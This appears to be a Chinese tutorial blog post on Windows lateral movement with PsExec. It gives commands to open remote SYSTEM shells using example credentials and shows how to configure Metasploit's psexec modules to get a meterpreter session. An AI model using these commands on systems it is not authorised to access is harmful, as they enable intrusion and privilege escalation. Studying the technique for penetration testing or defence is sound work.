横向移动 – PsExec 的使用

psexec 是用于批量维护 windows 主机的强大工具,尤其在域环境下表现出色。由于 psexec 是 windows 提供的工具,杀毒软件通常将其列入白名单。

通过 PsExec,可以在不使用远程桌面(RDP)的情况下,通过命令行与目标机器建立连接,并控制目标机器。

PsExec 是 PsTools 工具包的一部分,下载地址为:https://www.php.cn/link/9092e7bee2d622e7c6c5ef8476928917

利用 PsExec,可以在远程目标主机上执行命令,并将管理员权限提升至 System 权限以运行指定程序。

PsExec 的基本原理是通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘生成一个名为“PSEXESVC”的二进制文件,然后通过 psexec 服务运行命令,命令执行完毕后删除服务。

PsExec 的使用

首先,需要获取目标操作系统的交互式 Shell。在建立了 ipc$ 的情况下:

net use 192.168.3.21 /u:goddministrator Admin12345

横向移动 - PsExec 的使用

执行如下命令,获取 System 权限的 Shell:

PsExec.exe -accepteula 192.168.3.21 -s cmd.exe# -accepteula  第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框# -s      以System权限运行远程进程,获得一个System权限的交互式Shell,如果不用这个参数,那么会获得一个administrator权限的shell

横向移动 - PsExec 的使用横向移动 - PsExec 的使用

获得一个 administrator 权限的 shell:

PsExec.exe -accepteula 192.168.3.21 cmd.exe

横向移动 - PsExec 的使用

如果没有建立 ipc$,PsExec 有两个参数可以通过指定的账号和密码进行远程连接:

PsExec.exe 192.168.3.21 -u goddministrator -p Admin12345 cmd.exe# -u  域用户名# -p  密码

横向移动 - PsExec 的使用

使用 PsExec 在远程计算机上执行命令进行回显:

PsExec.exe 192.168.3.21 -u goddministrator -p Admin12345 cmd /c "ipconfig"

横向移动 - PsExec 的使用

PsExec 的注意事项

需要远程系统开启 admin 共享(默认是开启的),原理是基于 IPC 共享,目标需要开放 445 端口和 admin。

在使用 IPC 连接目标系统后,不需要输入账户和密码。

SpeakingPass-打造你的专属雅思口语语料 SpeakingPass-打造你的专属雅思口语语料

使用chatGPT帮你快速备考雅思口语,提升分数

SpeakingPass-打造你的专属雅思口语语料 25 查看详情 SpeakingPass-打造你的专属雅思口语语料

在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 服务。命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会产生大量的日志,可以在攻击溯源时通过日志反推攻击流程。

使用 PsExec 可以直接获得 System 权限的交互式 Shell(前提目标是 administrator 权限的 shell)。

在域环境测试时发现,非域用户无法利用内存中的票据使用 PsExec 功能,只能依靠账号和密码进行传递。

Metasploit 使用 PsExec 模块

查找有关 psexec 的模块:

search psexec

横向移动 - PsExec 的使用

有两个常用的模块:

exploit/windows/smb/psexecexploit/windows/smb/psexec_psh(Powershell 版本的 psexec)

使用模块:

use exploit/windows/smb/psexecset rhosts 192.168.2.25set smbuser administratorset smbpass Admin12345

横向移动 - PsExec 的使用

运行 exploit,运行脚本会获得一个 meterpreter:

横向移动 - PsExec 的使用

输入 shell,会获得一个 system 权限的 shell:

横向移动 - PsExec 的使用

psexec_psh 模块和 psexec 模块的使用方法相同,二者的区别在于,通过 psexec_psh 模块上传的 payload 是 powershell 版本的。

参考文章:

https://www.php.cn/link/004dbbb73c0e3933d191fa195500d018

以上就是横向移动 – PsExec 的使用的详细内容,更多请关注创想鸟其它相关文章!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/418265.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2025年11月7日 08:32:00
下一篇 2025年11月7日 08:32:55

相关推荐

  • Golang如何优化缓存使用提高性能_Golang缓存使用性能优化实践详解

    答案:本文介绍Golang缓存优化实践,涵盖策略选择、内存控制、穿透雪崩防护及高性能结构使用。1. 选用LRU、FIFO、LFU等策略提升命中率,推荐hashicorp/golang-lru实现线程安全LRU;2. 限制缓存大小防OOM,设置maxCacheSize并监控命中率与容量;3. 防范缓存…

    2025年12月16日
    000
  • Go语言实现multipart/form-data文件及数据上传教程

    本教程详细介绍了如何使用go语言构建和发送`multipart/form-data`类型的http post请求,以实现文件上传和多字段数据提交。文章将深入探讨`mime/multipart`和`net/http`包的使用,提供完整的代码示例,并强调关键步骤如表单字段创建、文件添加、以及正确设置请求…

    2025年12月16日
    000
  • Go语言与C++代码集成:使用SWIG而非已废弃的Makefile方法

    本文旨在解决go语言与c++++代码集成时遇到的`make.`和`make.pkg`文件缺失错误。此错误源于尝试使用已废弃的makefile方法。正确的解决方案是采用swig工具链,它能有效桥接go与c++代码,提供现代且推荐的互操作性途径,避免旧有构建机制引发的问题,确保go程序能够顺利调用c++…

    2025年12月16日
    000
  • 解决 GoLang Mgo 中 _id 字段无法正确映射的问题

    本文深入探讨了在使用 golang 的 `mgo` 库与 mongodb 交互时,`_id` 字段无法正确映射的常见问题。核心原因在于 go 结构体标签中 `json` 和 `bson` 键值对之间使用了制表符而非空格,导致标签解析失败。教程提供了详细的示例代码和正确的解决方案,帮助开发者避免此类因…

    2025年12月16日
    000
  • Go语言mgo库中ObjectId字段解析异常的排查与解决

    本文旨在解决Go语言使用`mgo`库与MongoDB交互时,`bson.ObjectId`字段无法正确解析的问题。核心问题源于Go结构体标签(struct tag)中,`json`和`bson`标签之间使用了制表符(tab)而非空格,导致`_id`字段始终为空。文章将详细阐述问题现象、根本原因及正确…

    2025年12月16日
    000
  • Go语言mgo库MongoDB _id字段解析异常排查与解决方案

    本教程旨在解决go语言使用mgo库操作mongodb时,_id字段无法正确解析的问题。核心原因在于go struct tag中json和bson标签之间使用了制表符而非单个空格,导致bson标签被go的反射机制错误解析或忽略。通过修正标签间的分隔符为单个空格,可确保mongodb的objectid值…

    2025年12月16日
    000
  • 如何在Golang中快速初始化项目模板

    使用标准结构和自动化工具快速初始化Go项目,通过创建cmd、internal、pkg等目录建立清晰骨架,结合shell脚本或cookiecutter等工具实现一键生成,并预置zap、viper等常用组件,提升开发效率。 在Golang中快速初始化项目模板,关键在于建立标准化结构并借助工具提升效率。下…

    2025年12月16日
    000
  • Go语言与C++代码集成:告别传统Makefile,拥抱SWIG

    本文旨在解决go语言与c++++代码集成时遇到的`make.`和`make.pkg`文件缺失错误。该问题源于尝试使用已废弃的makefile方法。我们将阐述这种方法的过时性,并推荐使用swig(simplified wrapper and interface generator)作为现代、高效的解决…

    2025年12月16日
    000
  • Go语言反射:动态获取变量类型详解

    go语言通过其内置的`reflect`包提供了强大的运行时类型检查能力。本文将详细介绍如何使用`reflect.typeof()`函数来动态获取任何go变量的类型信息,包括基本类型和复杂数据结构,并提供实用代码示例和使用注意事项,帮助开发者在需要进行类型内省时高效应用。 引言:Go语言中的类型内省 …

    2025年12月16日
    000
  • Go语言正则表达式:理解点号(.)对换行符的匹配行为与(?s)标志的应用

    go语言的正则表达式中,点号(.)默认情况下不匹配换行符。若需使其匹配包括换行符在内的所有字符,则需要在正则表达式模式中显式使用“点号匹配所有”(dot all)标志 `(?s)`。本文将详细阐述这一行为,并通过示例代码演示如何在go中正确应用 `(?s)` 标志来达到预期匹配效果。 1. 默认行为…

    2025年12月16日
    000
  • Go语言中从io.Reader读取和写入UTF-8编码字符串的实践指南

    本文深入探讨了go语言中utf-8字符串的编码与处理机制,包括rune、byte与string的区别。详细介绍了如何从io.reader高效读取utf-8编码的字节流并转换为go字符串,以及写入utf-8字符串的方法。强调了内存复制的考量,并提供了标准实践代码示例,旨在帮助开发者在tcp通信等场景下…

    2025年12月16日
    000
  • Go语言中实现接口的结构体切片转换:深度解析与泛型处理

    本文深入探讨了Go语言中将具体类型切片(如`[]Struct`)转换为接口类型切片(如`[]Interface`)的机制与挑战。尽管结构体实现了接口,但其切片类型并不能直接赋值给接口切片类型,这源于两者底层内存布局的根本差异。文章将介绍显式循环转换的常规方法,并进一步展示如何利用反射机制实现更具通用…

    2025年12月16日
    000
  • Go regexp:(?s) 标志与 . 字符的换行符匹配

    go语言的`regexp`包在默认情况下,正则表达式中的`.`字符不匹配换行符。本文将深入探讨`regexp`中`.`字符的匹配行为,解释为何其默认不包含换行符,并详细介绍如何通过在正则表达式模式中添加`(?s)`(dot all)标志来使其匹配包括换行符在内的任意字符,并通过示例代码演示这一关键用…

    2025年12月16日
    000
  • 如何在Golang中实现桥接模式

    桥接模式通过接口与组合分离抽象与实现:定义Renderer接口及Windows、Mac等具体实现,Message结构体持Renderer接口实例,实现显示逻辑与渲染方式解耦,新增LinuxRenderer无需修改Message,提升灵活性与可维护性。 桥接模式是一种结构型设计模式,它将抽象部分与实现…

    2025年12月16日
    000
  • 深入理解Go语言切片与append操作:函数参数传递、容量与底层数组的机制解析

    本文深入探讨go语言切片在函数参数传递和`append`操作中的行为。go切片是包含指向底层数组指针、长度和容量的描述符。当切片作为函数参数传递时,传递的是其描述符的副本。`append`操作根据容量是否充足,可能在原底层数组上修改,也可能重新分配新数组。理解这一机制对于避免因局部变量修改而无法影响…

    2025年12月16日
    000
  • Go语言与C++代码集成:告别旧式Makefile,拥抱SWIG

    本文旨在解决go语言与c++++代码集成时遇到的旧式makefile方法导致的“no such file or directory”错误。我们将阐明这种基于`make.`和`make.pkg`的链接方式已废弃,并详细介绍如何使用swig(simplified wrapper and interfac…

    2025年12月16日
    000
  • Go语言中嵌入式类型方法访问外部结构体字段的机制与实践

    本文深入探讨了go语言中嵌入式结构体的方法是否能够直接访问其外部(父)结构体字段的问题。通过分析go的组合机制和方法接收者原理,明确了这种直接访问是不可行的。文章提供了两种可行的解决方案:显式传递外部结构体实例或在嵌入式结构体中持有外部结构体引用,并对比了go语言中`db.save(user)`与`…

    2025年12月16日
    000
  • Go语言中获取对象类型的实践指南:深入理解 reflect.TypeOf()

    本教程详细介绍了Go语言中如何使用 `reflect` 包来获取对象的类型信息。我们将重点讲解 `reflect.TypeOf()` 函数的用法,并通过实例演示如何识别基本类型、复合类型(如切片),并探讨 `reflect.Type` 接口提供的更多功能。文章还将提供使用反射时的注意事项,帮助开发者…

    2025年12月16日
    000
  • Go语言中range循环与数组元素修改的深度解析

    本文深入探讨go语言`range`循环在处理数组时,其迭代变量默认是值的副本而非引用。通过示例代码,我们展示了直接修改迭代变量无法影响原始数组的问题,并提供了使用索引来正确修改数组元素的方法,强调了理解`range`行为对避免潜在编程错误的重要性。 理解Go语言range循环的工作原理 在Go语言中…

    2025年12月16日
    000
  • GoDoc如何显示接口类型变量:行为解析与实践指南

    本文旨在解析godoc工具对接口类型变量的显示行为。针对早期版本中可能存在的误解或特定环境问题,我们将明确指出在现代go版本中,godoc能够正确识别并展示所有导出的接口类型变量。文章将通过示例代码演示其工作原理,并提供相关注意事项,帮助开发者更好地理解和利用godoc进行代码文档化。 引言:GoD…

    2025年12月16日
    000

发表回复

登录后才能评论
关注微信